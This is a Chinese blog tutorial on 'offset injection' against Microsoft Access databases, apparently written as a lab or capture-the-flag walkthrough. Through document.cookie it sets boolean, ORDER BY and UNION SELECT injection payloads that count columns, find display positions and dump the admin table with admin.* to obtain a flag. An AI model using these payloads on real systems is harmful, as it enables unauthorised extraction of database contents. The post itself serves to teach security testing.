美文网首页
Access注入——偏移注入

Access注入——偏移注入

作者: 白面安全猿 | 来源:发表于2021-09-30 21:36 被阅读0次

偏移注入简介

使用场景

一些无法查询的列名,比如权限不足的 知道表名却不知道字段 使用偏移查询主要查询字段及内容等。

使用条件

(1):知道表名

(2):注入点的字段数必须要大于查询的字段

常见问题

1 .* 的作用

用于代替表内全部字段,在不能用系统自带库查字段名时。

2.偏移注入是否仅用于Access

不是,mysql也可以使用偏移注入。

3.偏移注释时联合查询后的一张表为什么要小于前一张表

联合查询必须要满足一个条件,就是前面的查询和后面的查询字段数必须相等,因为前面那张表的查询字段数是固定的,后面那张我们控制,但是当你使用admin.* 代表admin整个表的字段,如果admin表字段比前面那个表多,就不符合联合查询。

偏移注入实战

1.判断注入点

document.cookie="ID="+escape("105 and 1=1") 页面显示正常

document.cookie="ID="+escape("105 and 1=2") 页面显示错误

存在 注入。

2. 判断当前页面字段总数

document.cookie="ID="+escape("105 and 1=1 order by 26")  页面显示正常

document.cookie="ID="+escape("105 and 1=1 order by 27")  页面显示错误

==》当前页面字段数为 26。

3.爆破表名

在前面已经爆破出了表名 admin          Access注入之Cookie注入

4.判断显示位

document.cookie="ID="+escape("105 and 1=2 union select 1121212,2121212,3121212,4121212,5121212,6121212,7121212,8121212,9121212,10121212,11121212,12121212,13121212,14121212,15121212,16121212,17121212,18121212,19121212,20121212,21121212,22121212,23121212,24121212,25121212,26121212 from admin")

得到显示位 3,5,7,25。

5.查字段内容

document.cookie="ID="+escape("105 and 1=2 union select 1,2,3,4,5,6,7,8,9,admin.*,10  from admin"

得到FALG

相关文章

  • 小迪16期-20170401

    第六天:MySQL防注入研究 MySQL头注入(http)Access偏移注入CSRF攻击 MySQL防注入 过滤...

  • Access注入——偏移注入

    偏移注入简介 使用场景 一些无法查询的列名,比如权限不足的 知道表名却不知道字段 使用偏移查询主要查询字段及内容等...

  • access/mssql手动注入

    一.本文介绍 1、本文介绍access手工注入、mssql注入获取webshell 二.手动注入 1、access...

  • access数据库注入4-access偏移注入

    前言 最近在看access注入,本来想找个目标来试试,但是项目刚结束手上暂时也没有相关的站,而且网上找了半天没有找...

  • SQL注入靶场—Access下的偏移注入

    首先进入产品中心: 这里利用上一节的 Access注入—Cookie注入 的方式获取所需的字段数,实测字段数为26...

  • 【渗透测试】-SQL注入之Access偏移注入

    讲在前面,Access和mysql5.0之前的版本。进行注入的时候都是采用暴力猜解的方式进行的,而mysql5.0...

  • 小迪16期-20170226

    第二天:Sql注入集锦篇 1.Sql注入之access注入 2.Sql注入之mysql注入 3.Sql注入之mss...

  • Access注入

    1. 判断是否存在注入 ' and 1=1 and 1=2 or 1=2 or 1=2 ' and '1'='1 ...

  • 小迪16期-20170305

    第三天:Sql注入技巧篇 1.Sql注入之access注入 access数据库结构数据库表名数据库列名数据 1.a...

  • ACCESS手工注入

    判断是否存在注入 找到一个类似于http://www.xxx.com/xx.asp?id=xxxx的URL后(用G...

网友评论

      本文标题:Access注入——偏移注入

      本文链接:https://www.haomeiwen.com/subject/weqynltx.html